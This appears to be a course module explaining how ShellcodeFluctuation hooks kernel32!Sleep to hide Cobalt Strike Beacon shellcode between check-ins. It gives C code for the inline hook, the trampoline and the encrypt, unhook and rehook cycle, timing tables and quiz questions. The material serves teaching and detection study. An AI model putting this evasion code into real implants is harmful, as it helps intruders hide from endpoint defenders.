Difficulty: Intermediate

Module 4: Sleep Function Hooking

How ShellcodeFluctuation intercepts kernel32!Sleep via inline hooking to gain control before and after the implant sleeps.

Module Objective

Understand how inline function hooking works, why ShellcodeFluctuation hooks kernel32!Sleep specifically, the trampoline mechanism for calling the original function, the MySleep handler architecture, and why the hook is temporarily removed during the actual sleep call.

1. Why Hook Sleep?

Cobalt Strike Beacon (and most C2 implants) calls kernel32!Sleep to pause between check-ins. This is the natural interception point for ShellcodeFluctuation because:

Sleep as the Interception Target

Guaranteed to be called — every beacon cycle includes a sleep. The implant cannot avoid calling it
Called from within the implant — the call originates from the shellcode itself, so hooking Sleep intercepts at exactly the right moment
Single point of control — one hook gives control over every transition between active and idle states
Natural boundary — Sleep marks the exact moment when the implant transitions from "doing work" to "waiting" — the ideal time to encrypt
Known function signature — void WINAPI Sleep(DWORD dwMilliseconds) has a single parameter, making it easy to wrap

2. Inline Hooking vs IAT Hooking

There are two primary approaches to hooking a Windows API function. ShellcodeFluctuation uses inline hooking:

Method	Mechanism	Pros	Cons
IAT Hooking	Modify the Import Address Table entry for `Sleep` to point to the hook function	No code modification; works with the PE loader	Only affects imports through the hooked module's IAT; does not catch calls from other modules or via `GetProcAddress`
Inline Hooking	Overwrite the first bytes of `kernel32!Sleep` with a JMP to the hook function	Catches ALL calls to Sleep regardless of how they are resolved	Modifies mapped DLL code (triggers copy-on-write); must save original bytes for trampoline

ShellcodeFluctuation uses inline hooking because Cobalt Strike Beacon resolves Sleep via GetProcAddress at runtime, bypassing the IAT entirely. An IAT hook would never intercept the call.

3. Inline Hook Mechanics

An inline hook replaces the first instructions of the target function with a jump to the hook handler. The original instructions are preserved in a "trampoline" so the original function can still be called.

// kernel32!Sleep original bytes (x64):
// 48 89 5C 24 08     mov  [rsp+8], rbx
// 57                 push rdi
// 48 83 EC 40        sub  rsp, 0x40
// ...

// After inline hook installation:
// E9 XX XX XX XX     jmp  MySleep        ; 5-byte relative jump
// 57                 push rdi            ; leftover byte (unreachable)
// 48 83 EC 40        sub  rsp, 0x40
// ...

Hook Installation Steps

Resolve target address — get the address of kernel32!Sleep via GetProcAddress
Save original bytes — copy the first N bytes from the function prologue (enough for the JMP instruction)
Make writable — VirtualProtect the target page to PAGE_EXECUTE_READWRITE
Write JMP — overwrite the first bytes with a relative or absolute JMP to MySleep
Restore protection — VirtualProtect back to PAGE_EXECUTE_READ
Build trampoline — allocate a small code region containing the saved bytes followed by a JMP back to Sleep+N

// Simplified inline hook installation
BOOL InstallHook(LPVOID targetFunc, LPVOID hookFunc, LPVOID* trampoline) {
    const int HOOK_SIZE = 5;  // Size of E9 rel32 JMP on x86
                               // On x64 we may need more bytes for far JMP

    // 1. Allocate trampoline
    *trampoline = VirtualAlloc(NULL, 64, MEM_COMMIT | MEM_RESERVE,
                               PAGE_EXECUTE_READWRITE);

    // 2. Copy original bytes to trampoline
    memcpy(*trampoline, targetFunc, HOOK_SIZE);

    // 3. Append JMP back to targetFunc + HOOK_SIZE
    BYTE* trampolineJmp = (BYTE*)*trampoline + HOOK_SIZE;
    trampolineJmp[0] = 0xE9;  // relative JMP
    *(DWORD*)(trampolineJmp + 1) =
        (DWORD)((BYTE*)targetFunc + HOOK_SIZE - (trampolineJmp + 5));

    // 4. Write JMP to hookFunc at target
    DWORD oldProt;
    VirtualProtect(targetFunc, HOOK_SIZE, PAGE_EXECUTE_READWRITE, &oldProt);
    ((BYTE*)targetFunc)[0] = 0xE9;  // relative JMP
    *(DWORD*)((BYTE*)targetFunc + 1) =
        (DWORD)((BYTE*)hookFunc - ((BYTE*)targetFunc + 5));
    VirtualProtect(targetFunc, HOOK_SIZE, oldProt, &oldProt);

    return TRUE;
}

4. The x64 Long-Jump Problem

On x86-64, a 5-byte relative JMP (E9) can only reach addresses within +/- 2 GB of the instruction. Since kernel32.dll and the hook function may be more than 2 GB apart in the 64-bit address space, ShellcodeFluctuation may need to use a longer jump sequence:

// Option 1: Relative JMP (5 bytes) - works if within 2 GB
// E9 [rel32]
// Range: +/- 2,147,483,647 bytes

// Option 2: Absolute indirect JMP (14 bytes) - works anywhere
// FF 25 00 00 00 00     jmp [rip+0]
// XX XX XX XX XX XX XX XX   ; 8-byte absolute address

// ShellcodeFluctuation approach:
// Uses 14-byte absolute JMP when the hook function is
// more than 2 GB from the target
void WriteAbsoluteJmp(BYTE* target, LPVOID destination) {
    // FF 25 00 00 00 00 = jmp qword ptr [rip+0]
    target[0] = 0xFF;
    target[1] = 0x25;
    *(DWORD*)(target + 2) = 0;  // RIP-relative offset = 0
    *(UINT64*)(target + 6) = (UINT64)destination;
    // Total: 14 bytes
}

Byte Count Matters

The number of original bytes overwritten must align with instruction boundaries. Overwriting the middle of an instruction creates invalid code in the trampoline. Tools like a length-disassembly engine (LDE) are used to calculate the exact number of bytes to copy, ensuring complete instructions are preserved.

5. The MySleep Handler

The hook redirects all calls to kernel32!Sleep to ShellcodeFluctuation's MySleep function. This is the heart of the fluctuation mechanism:

// Global state
LPVOID  g_shellcodeBase = nullptr;
SIZE_T  g_shellcodeSize = 0;
DWORD   g_xorKey = 0;
LPVOID  g_sleepTrampoline = nullptr;  // Trampoline to original Sleep

// The hook handler - called instead of kernel32!Sleep
void WINAPI MySleep(DWORD dwMilliseconds) {
    // Phase 1: ENCRYPT
    // Flip shellcode to writable
    DWORD oldProt;
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_READWRITE, &oldProt);

    // XOR encrypt the shellcode region
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);

    // Phase 2: SLEEP
    // Call original Sleep via trampoline
    typedef void (WINAPI* fnSleep)(DWORD);
    ((fnSleep)g_sleepTrampoline)(dwMilliseconds);

    // Phase 3: DECRYPT
    // XOR decrypt the shellcode region
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);

    // Flip shellcode back to executable
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_EXECUTE_READ, &oldProt);
}
// Execution returns to the shellcode, which continues normally

MySleep Execution Flow

Beacon calls
Sleep(60000)

→

JMP to
MySleep

→

Encrypt +
Flip to RW

→

Original
Sleep()

→

Decrypt +
Flip to RX

→

Return to
Beacon

6. Why Unhook Before Sleeping

A critical detail in ShellcodeFluctuation's implementation: the inline hook on kernel32!Sleep is temporarily removed before the actual sleep call and reinstalled after waking. This is done to eliminate the "Modified code" IOC in Moneta:

// Improved MySleep with hook/unhook cycle
void WINAPI MySleep(DWORD dwMilliseconds) {
    // Phase 1: ENCRYPT
    DWORD oldProt;
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_READWRITE, &oldProt);
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);

    // Phase 1.5: UNHOOK Sleep
    // Restore original bytes to kernel32!Sleep
    DWORD hookProt;
    VirtualProtect(g_sleepFunc, g_hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_sleepFunc, g_originalBytes, g_hookSize);
    VirtualProtect(g_sleepFunc, g_hookSize, hookProt, &hookProt);

    // Phase 2: SLEEP (with clean kernel32)
    Sleep(dwMilliseconds);  // Direct call - no hook in place

    // Phase 3: RE-HOOK Sleep
    VirtualProtect(g_sleepFunc, g_hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_sleepFunc, g_hookBytes, g_hookSize);
    VirtualProtect(g_sleepFunc, g_hookSize, hookProt, &hookProt);

    // Phase 4: DECRYPT
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_EXECUTE_READ, &oldProt);
}

Why This Matters

During the sleep window (when scanners are most likely to scan), kernel32!Sleep contains its original, unmodified bytes. Moneta comparing in-memory kernel32 against the on-disk file will find no differences. The hook is only present during the brief active window when the implant is executing — the same window that is already too short for reliable scanning.

The Persistent IOC

Even with the unhook/rehook cycle, the copy-on-write page persists. Writing to kernel32's .text section (even temporarily) converts the shared page to a private page. Moneta can detect that kernel32 has private pages in its .text section, even if the content matches the on-disk file. However, the IOC message changes from "Modified code" (suspicious) to a weaker working-set anomaly (less suspicious, as legitimate processes can also cause private pages).

7. Hook/Unhook Timing Window

Understanding the exact timing of when the hook is present vs absent is critical for evaluating the technique's effectiveness:

Phase	Hook Present?	Shellcode State	Duration	Scanner Risk
Active execution	Yes	RX + Cleartext	~100ms	Hook detectable, shellcode scannable (but brief)
MySleep entry	Yes	Transitioning	~microseconds	Minimal
After unhook	No	RW + Encrypted	~60 seconds	Neither hook nor shellcode detectable
After rehook	Yes	Transitioning	~microseconds	Minimal
Active execution	Yes	RX + Cleartext	~100ms	Hook detectable, shellcode scannable (but brief)

8. Trampoline vs Direct Call

After unhooking Sleep, the implementation can call Sleep directly rather than through the trampoline. This is a cleaner approach because the trampoline is no longer needed once the original bytes are restored:

// Two approaches to calling original Sleep:

// Approach 1: Via trampoline (used when hook stays in place)
// The trampoline contains:
//   [original bytes from Sleep prologue]
//   [JMP back to Sleep + hookSize]
// This allows calling original Sleep without removing the hook.

// Approach 2: Direct call after unhooking (ShellcodeFluctuation)
// Since we restore original bytes before sleeping:
//   1. Unhook: restore original bytes to kernel32!Sleep
//   2. Call Sleep() directly - it's now unmodified
//   3. Rehook: install JMP bytes again
// Cleaner: no trampoline allocation, no extra executable memory

Approach Comparison

Factor	Trampoline (hook stays)	Unhook/Rehook (ShellcodeFluctuation)
Hook visible during sleep?	Yes — kernel32 modified	No — kernel32 clean
Extra allocation?	Yes — trampoline is executable private memory	No — original function used directly
Complexity	Simpler (one-time setup)	More complex (restore/reinstall per cycle)
Performance	Slightly faster (no memcpy per cycle)	Slightly slower (two memcpy per cycle)
Stealth	Lower — hook always visible	Higher — hook only visible during execution

Knowledge Check

Q1: Why does ShellcodeFluctuation use inline hooking rather than IAT hooking for kernel32!Sleep?

A) IAT hooking is harder to implement

B) Cobalt Strike resolves Sleep via GetProcAddress at runtime, bypassing the IAT

C) Inline hooking is undetectable by all scanners

D) IAT hooking requires kernel-mode access

Q2: Why is the Sleep hook temporarily removed before the actual sleep call?

A) The hook interferes with the Sleep timer

B) Windows requires unhooked functions for proper thread scheduling

C) To eliminate the "Modified code in kernel32" IOC during the long sleep window

D) The hook code would be encrypted along with the shellcode

Q3: What is the purpose of a trampoline in inline hooking?

A) It preserves the overwritten original bytes and jumps back, allowing the original function to be called

B) It encrypts the hook bytes to avoid detection

C) It provides a backup copy of the entire target DLL

D) It implements the XOR encryption algorithm

← Prev: VirtualProtect & Page Permissions Next: The Fluctuation Algorithm →